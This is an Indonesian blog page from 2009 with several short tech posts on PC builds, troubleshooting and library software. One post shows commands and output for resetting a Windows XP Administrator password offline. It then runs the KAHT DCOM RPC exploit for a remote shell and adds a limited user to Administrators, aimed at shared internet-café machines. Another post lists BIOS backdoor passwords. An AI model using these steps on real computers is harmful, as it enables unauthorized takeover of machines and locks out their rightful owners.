Cari Blog Ini

Senin, 27 April 2009

RECOMANDED PC SYSTEM


computer-systemSekarang ini banyak sekali produk-produk terbaru dari berbagai vendor hardware yang menyebar di pasaran. Masing-masing dari mereka berusaha untuk unjuk kemampuan dengan memberikan penawaran-penawaran berupa teknologi dan kemampuan overclocking. Banyaknya produk yang ada dipasaran justru makin membuat konsumen menjadi bingung untuk menentukan pilihan. Apalagi meracik sebuah sistem yang benar-benar value dan memiliki performa tinggi.
Berikut saya kutip dari sebuah racikan sistem PC yang direkomendasikan oleh tim di lab tester HYPERmedia magazine. Sistem ini juga telah melewati berbagai proses pengetesan dan lolos uji dari lab tester HYPERmedia magazine sebagai sistem yang layak untuk anda miliki.

The Best Choice for AMD
Untuk prosessor saat ini direkomendasikan menggunakan AMD generasi X2 (AMD X2 3600+Brisbane). Prosessor masih mampu mengimbangi kinerja dari prosessor AMD generasi terbaru (Phenom). Pada mainboard disarankan yang berchipset NVIDIA, dan juga yang mendukung platform teknologi terbaru agar anda siap jika AMD menyempurnakan teknologi prosessornya. Spesifikasi lengkap untuk platform AMD sebagai berikut :
- Prosessor : AMD X2 3600+Brisbane
- Mainboard : Chipset 790FX dari NVDIA socket AM2+
- Kartu grafis : HD 3850
- Memori : DDR2 2Gb
- Storage : 160Gb dengan buffer 8M
- Optical Drive : DVDRW
- Display : LCD 19” widescreen
- PSU : True power 400W

Platform PC Berbasis Intel
Untuk platform PC berbasis Intel, ada begitu banyak jenis yang ditawarkan dan memiliki kemampuan yang lebih. Walaupun begitu, Intel tetap mendapatkan persaingan dari AMD yang masih berusaha memperbaiki masalah di prosessor mereka. Spesifikasi lengkap untuk sistem PC berbasis Intel adalah sebagai berikut :

Low end system
- Prosessor : Intel 1200
- Mainboard : Berchipset P35
- Kartu grafis : Nvidia 9600GT
- Memori : DDR2 2Gb
- Storage : 160Gb dengan buffer 8M
- Optical Drive : DVDRW
- Display : LCD 19” widescreen
- PSU : True power 400W

Mainstream PC
- Prosessor : Intel Core 2 Duo Wolfdale 45nm
- Mainboard : Berchipset P35
- Kartu grafis : Nvidia 9600GT
- Memori : 1Gbx2 DDR2 1200MHz micron
- Storage : 250Gb dengan buffer 32M
- Optical Drive : DVDRW
- Display : LCD 19” widescreen
- PSU : True power 750W

Performance PC
- Prosessor : Intel QX9770 Penryn 45nm
- Mainboard : Berchipset x48 with native DDR3
- Kartu grafis : 2x HD3870 X2
- Memori : 2Gbx2 DDR3 @ 2000MHz
- Storage : 150Gbx4 under-RAID configuration
- Optical Drive : DVDRW
- Display : LCD 19” widescreen
- PSU : True power 1000W

Sistem di atas diyakini oleh lab tester HYPERmedia Magazine akan memberikan performance diatas 100%. Sekali lagi, anda jangan terlalu bernafsu untuk memiliki pheriperal baru yang kinerjanya belum tentu sempurna. Pikirkan kembali untuk memilih produk-produk yang bernilai value namun memiliki kinerja yang melebihi berkemampuan dari pheriperal baru yang belum sempurna. Semoga artikel ini bermanfaat bagi anda yang ingin memilih sistem PC yang memiliki value tinggi.


Ketemu Artis di Basecamp HyEm


Kebayang ga’ jika kita bertemu dengan artis ataupun bintang film terkenal gt, gmn perasaannya? Deg-degan, bangga, gembira, senang, terharu, mau pinsan, malu bahkan malu-maluin, kagum dengan posisi muka “ndomblong” ???semua becampur jadi satu. Itu mungkin perasaan anda-anda sekalian jika bertemu dengan superstar kaya dan terkenal dan juga bangsawan yang punya banyak kapal….*cpd, kalo saya tetep beda dong, androes gt loh… :D

Bangga dan kagum, merupakan salah satu perasaan yang mewakili saya ketika menyatroni basecamp HYPERmedia Magazine (nama kerennya hyem). Ya, disana (baca *Gg. Kamboja 96, Pondok, Karangbendo, Banguntapan, Bantul, Yogyakarta) rumah sederhana yang cukup adem untuk wilayah sepanas Jogja, yang dalemnya dipenuhi dengan piala dan penghargaan berbagai macam kejuaraan overclock baik tingkat nasional maupun internasional.

Disanalah saya bertemu dengan 2 orang artis i.t, yang pertama “blackzone” (ntu nama udaranya, klu dari ortu Rasmiadi dipanggilnya Adi). Uda pada tau kan siapa dia, bagi para ocer ataupun anda yang suka bergulung-gulung di bidang overclocking pastilah tau. Yupz, dia salah satu tim lab tetsternya hyem, boleh dibilang dedengkotnya ocer Indonesia. Ramah memang orangnya, seramah ketika ia bermain-main dengan liquid nitronya. Suara besar yang agak berat mengawali perbincangan kita. Sebenarnya kedatangan saya ke sana tidak lain dan tidak bukan untuk membahasa rencana sebuah acara Overclocking Contest di Solo dimana hyem akan menjadi partner kita (D3 Ilkom UNS).

Ditengah-tengah perbincangan kita, muncul seorang yang berperawakan tinggi besar, rambut cepak (duh, bahasa yang tepat apa ya..?), siapalagi ni orang. Pertanyaan saya tentang siapa orang ini ga’ bertahan lama karna dia langsung memperkenalkan diri. Ternyata dia “Panji” (haaaa….Panji?? dia big bos HYPERmedia Magazine). Tak asing juga buat kita yang sering mampir ke forum www.hyem.org .
Panjang lebar mereka jelaskan tentang konsep dan semua tentang penyelenggaraan overclocking contest. Profesional sekali mereka menjelaskan semua itu, ya karena hyem memang sudah bidangnya untuk hal-hal yang berbau overclock. Tak jarang juga mereka bercerita tentang pengalaman mereka waktu mengikuti lomba. Luar biasa sekali, pantes aja mereka nyabet best winner diberbagai kejuaraan overclock baik nasional maupun internasional.

Wah, waktu dah menunjukkan pukul 10.00, kita harus segera balik ke Solo biar g telat sholat jum’atannya. Pertemuan itu pun harus kami akhiri, dan mereka bilang “nanti kita lanjutkan nngobrolnya via YM”. Pas mau pulang, eeeee,,,,,senengnya saya dikasih satu paket majalahnya hyem, yupz..mulai dari edisi 1-10, wew…gratis nih…walau berat bawanya tapi itu sebanding dengan isi dari majalah mereka yang selanjutnya tidak akan di cetak lagi. Loh knapa,????ya, mereka akan membagi-bagikan secara gratis di internet. Bagi yang mau download silahkan gabung di www.hyem.org

Mungkin itu dulu cerita pertemuan saya dengan “Panji” dan “blackzone”…hiks hiks,,,g bawa kamera, g bisa poto-poto deh (haiyah,,,kaya apa ja). Ntar pengen ketemu siapa lagi ya, om Onno W. Purbo uda pernah, temen2 X Code uda, vounder hyem uda, wah,,,,ternyata masih banyak artis2 i.t ibukota yang belum kujumpai. InsyaAlloh, semoga saja, jika ga’ bisa ketemu langsung minimal bisa berkomunikasi lewat udara :D , tetep dengan ID andrey_ayyasha22 yang selalu menemani setiap detail penjelajahan di dunia mayaku…hehe…




Exploit Password WinXP


Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng… heuheueehuhuehuee ! Jawab sendiri dah …

Teknik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) –> untuk disket boot Petter Recovery Password.
Nekatzzzz ….

Kasusnya begini, misalnya ….anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang … hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual … huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh …

1) Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut …
2) Anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya.
3) Setelah itu ……. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrator saja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya …. hehehehe !!!
4) Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery.
5) Sudah ??? … siiiip, tekan ” !” untuk mengakhir sesi reset password, dan ” q ” untuk mengakhiri scripts tersebut.
6) Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh … Edit Completed.
Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system baru di acak-acak niy : ). Tunggu hingga proses scandisk selesai.
7) Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe… ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox…

———————————
| Log On to Windows | x
———————————
| User Name : 4ndr03s
| Password : ******
|
| | Ok | | Cancel | | BLABL
———————————

Ya, bentuknya kira-kira seperti diatas … : )…
Setelah itu ganti usernamenya menjadi administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng… sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Teknik Kedua :
Tiba saatnya kita maju bersama … :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin (misalnya di warnet2 tuh), sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah access untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???… buka command promptnya …(lagi-lagi layar item putih, hihihihi)

C:\Documents and Settings\4ndr03s>net user

User accounts for \\NOMATTER
——————————————————————————-
Administrator 4ndr03s GNU –keluarga–
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.

// Anggap saja disini 4ndr03s adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya… bisa nggak nih kita nge-root.

D:\Data+ku_>kaht 127.0.0.0 127.0.0.3

_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING

________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress…
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server…
- Conectando con la Shell Remota…

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User (keren ya? dari user biasa jadi super admin)

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.

Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : ( (hahaha,,, ya maap, yg SP2 lum dapet ilmunya)

// Refferensi : [androes thanks to mas al]
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink


Menjebol Password BIOS


Menjebol password? Ya, yang saya maksudkan disini adalah menjebol password BIOS ketika kita lupa akan password BIOS komputer kita. Bisa g ya teknik ini dinamakan hacking hardware? hehehe :D
Untuk keamanan komputer, memang alangkah baiknya dilakukan pemberian password pada BIOS. Tetapi setelah lama menggunakannya dan mungkin karena memang jarang mengotak-atik BIOS, kita lupa akan password BIOS. Dan apa yang terjadi? kita tidak bisa masuk ke sistem operasi. Pengen tau cara menjebol password BIOS? :D

Langlah paling mudah untuk menjebol password BIOS adalah melepas baterei CMOS yang ada pada mainboard atau bisa juga dengan melakukan hubungan pendek pada baterei tersebut. Tetapi jangan langsung terburu-buru mencabut baterei CMOS tersebut. Coba anda ingat-ingat, kapan anda membeli komputer anda ini. Mengapa demikian?
Ya, karena ketika kita melepas baterei CMOS, sedangkan komputer kita masih dalam masa garansi, maka otomatis kita akan melepas segel yang terdapat pada baterei CMOS, dan kita pun kehilangan lisensi garansi hardware komputer kita.

Sebelum melakukan hal tersebut alangkah baiknya ada mencoba beberapa password alternatif di bawah ini. (saya menemukan password ini dari buku tentang troubleshooting).

Password default untuk AMI BIOS
- A.M.I
- AMI
- AMI_SW
- AMI?SW
- BIOS
- HEWITTRAND
- LKWPETER
- PASSWORD

Password default untuk AWARD BIOS
- 589589
- ALLY
- ALFAROME
- AWARD_SW
- AWARD?SW
- AWKWARD
- BIOSTAR
- CONCAT
- HLT
- 1256
- 1262
- LKWPETER
- SER
- SKY_FOX
- SYXZ

Password default untuk PHOENIX
- BIOS
- CMOS
- phoenix
- PHOENIX

Jika dengan password default ini sudah tidak bisa, maka mencabut baterei CMOS merupakan alternatif paling mudah. :D


Mengatasi Komputer Crash


Hal ini pernah saya alami ketika saya mendapat tugas mengecek komputer-komputer di sebuah warnet. Komputer hidup, tetapi tidak sedang digunakan untuk beraktifitas. Tiba-tiba PC crash. Kondisi seperti ini sering terjadi dan fenomenanya pun bermacam-macam seperti komputer reset seketika, hang, ataupun freeze.

Apa yang harus kita lakukan dalam kondisi seperti itu?
Hemm… cobalah mulai dengan melacak kesalahan dengan teknik-teknik pengecekan sebagai berikut :

1) Pada kondisi komputer mati, putuskan semua daya dan lepaskan penutup (casing) PC.
2) Chek semua koneksi kabel yang terhubung dengan motherboard. Pastikan semua kabel terhubung dengan sempurna.
3) Chek juga piranti offboard seperti RAM, VGA, Sound card juga prosessor. Pastikan posisi tepat pada tempatnya.
4) Tegangan pada casing juga dapat menyebabkan gangguan kontak. Longgarkan sekrup-sekrup pada sandaran semua card di bagian belakang casing. Kadang-kadang sandaran card yang melengkung juga dapat menyebabkan timbulnya tegangan pada casing.
5) Periksa putaran kipas prosessor dan kipas casing. Crash komputer sering terjadi karena suhu CPU yg terlalu tinggi. Pembersihan kipas perlu dilakukan, bila perlu diber pelumas pada motor kipas agar putaran kipas stabil.
6) Jika dengan berbagai pengecekan di atas ternyata tidak membuahkan hasil, maka langkah terakhir adalah melakukan pengecekan dengan melakukan penukaran adapter, RAM atau prosessor yang lain. Kerusakan pada adapter tertentu, akan sulit untuk dianalisa secara menyakinkan. Apalagi jika kondisi fisik adapter tersebut dalam keadaan baik. Hal itu disebabkan karena adapter modern akan mematikan semua saluran pengecekan pada hampir semua jenis kesalahan. Satu-satunya cara adalah menukar adapter yang lama dengan adapter lain dan kemudian mengamati perubahan yang terjadi.

Teknik terakhir itu terus terang saya belum mencoba, karena pada kasus yang saya tangani, komputer kembali normal pada tahapp pengecekan sampai no 5


Mengenal Motherboard dan BIOS


Kali ini saya akan mencoba membahas tentang hardware komputer. Sebelum menyelesaikan masalah2 yang sering terjadi pada komputer kita atau bisa disebut troubleshooting, pertama marilah kita mengenal piranti keras [hardware] komputer terlebih dahulu.

Saya awali dari hardware induk komputer yaitu motherboard. Sesuai dengan namanya, Motherboard atau papan induk merupakan pusat pengendali yang mengatur kerja dari semua komponen yang terpasang disana. Papan tersebut juga melakukan pengaturan lalu lintas data piranti2 seperti hardisk, CD-ROOM, sampai pada keyboard, mouse dan bahkan printer. Singkatnya, hampir semua komponen komputer terhubung dengan Motherboard. Motherboard juga yang melakukan pengaturan terhadap pemberian sumber daya listrik pada setiap komponen di dalam PC.
Berbagai motherboard beredar di pasaran. Mulai dari produk2 Intel yang sampai sekarang nampaknya masih mendominasi pasaran sampai pada produk2 asal Taiwan seperti VIA Technologies yang telah menciptakan motherboard yang berkualitas dengan harga yang cukup murah.

Yang kedua adalam BIOS. BIOS merupakan singkatan dari Basic Input Ouput System berisikan kumpulan informasi tentang mainboard dan juga merupakan sofware yang berisi perintah2 dasar. Fungsi utama dari BIOS ini adalah sebagai sarana komunikasi antara sistem operasi dengan komponen2 yang terpasang pada motherboard


Senayan:Program Aplikasi Automasi Perpustakaan


Senayan adalah software automasi perpustakaan opensource yg dibuat oleh Hendro Wicaksono (hendro.wicaksono@diknas.go.id) dan Arie Nugraha (arie@senayan.diknas.go.id) dari diknas (Departemen Pendidikan Nasional). Seperti yg diungkapkan dinas, alasan pembuatan software ini adalah kemampuanya untuk dapat di modifikasi dan digunakan secara free dan dikembangkan lewat komunitas dengan begitu jika ada bug dapat di share dan di pecahkan bersama-sama komunitas, hal terlebut ygmembedakan dengan aplikasi outomasi fee.

Menurut Hendro dalam louncing Senayan di Pusat Kebudayaan Koesnadi Harjasoemantri kampus UGM Yogyakarta pada tanggal 8 Desember 2007, software senayan mempunyai struktur database base sql yg memiliki susunan lebih sempurna dari aplikasi lain seperti openbiblio.

Untuk kesempurnaan setiap ada laporan bug aplikasi ini selalu di update, hingga saat ini sudah di update 7, untuk mengupdate tinggal mengcopy script kemudian di paste di htdoc folder senayan.

Download Aplikasi “Senayan Librabry Automation”
>> Senayan3-stable4 : http://senayan.diknas.go.id/web/?q=node/1

Berikut adalah cara mengisntal aplikasi senayan :

> Instal Xampp, yang di dalamnya terdapat paket apache, mysql sehingga kita tidak perlu untuk menginstall secara terpisah apache dan mysql. Jika belum mempunyai anda dapat mendownloadnya di: http://sourceforge.net/project/downloading.php?groupname=xampp&filename=xamp

> Ekstrak senayanrc-7 dan di rename dengan nama senayan di program file/xampp/htdoct (yang berfungsi sebagai server). Jika anda belum punya, dapat anda download di http://senayan.diknas.go.id cari update terbaru.

> Setting sysconfig.inc, di program file/xampp/htdoct/senayan. Klik kanan sysconfig.inc kemudian openwith notepad atau wordpad.

> Buat database mysql. Klik xampp di program file kemudian pilih mysql klik data, buat new folder dengan nama senayan_demo ( folder ini di maksudkan untuk menyimpan segala data yang ada di senayan)

> Dumping sql, dumping sql menggunakan browser ( internet exploler atau mozila). Buka browser internet exploler atau mozila kemudian ketikan di url bar http://localhost/phpmyadmin, kemudian pilih database yang telah di buat tadi yaitu senayan_demo kemudian klik tombol browse cari senayan.sql di folder senayan yang terletak di htdoc setelah itu klik tombol go.

> Membuka aplikasi senayan, tulis di url bar browser anda http://localhost/senayan kemudian jika berhasil akan muncul tampilan seperti ini.

> untuk login. Username: admin, password: admin

Selamat mecoba….. :D :D :D


Goresan Pena Pejuang Kecil Ambon


Malam semakin larut, badanku pun terasa melelahkan, entah karna cape’ atau memang karna ak masih dalam masa penyembuhan. Akhirnya



Icon Gratis & 3D Animal Smile



Silahkan
download icon-icon ini, bisa kamu gunakan untuk icon di website:

caranya :> “klik kanan” pada icon yang diinginkan, kemudian pilih “save image as”, tentukan lokasi penyimpanan file, klik OK…tunggu bentar and kesimpen deh iconnya…



Silahkan download dalam bentuk zip nya di ilmuwebsite.info
Sumber dari situs Ilmu Website


Tidak ada komentar:

Posting Komentar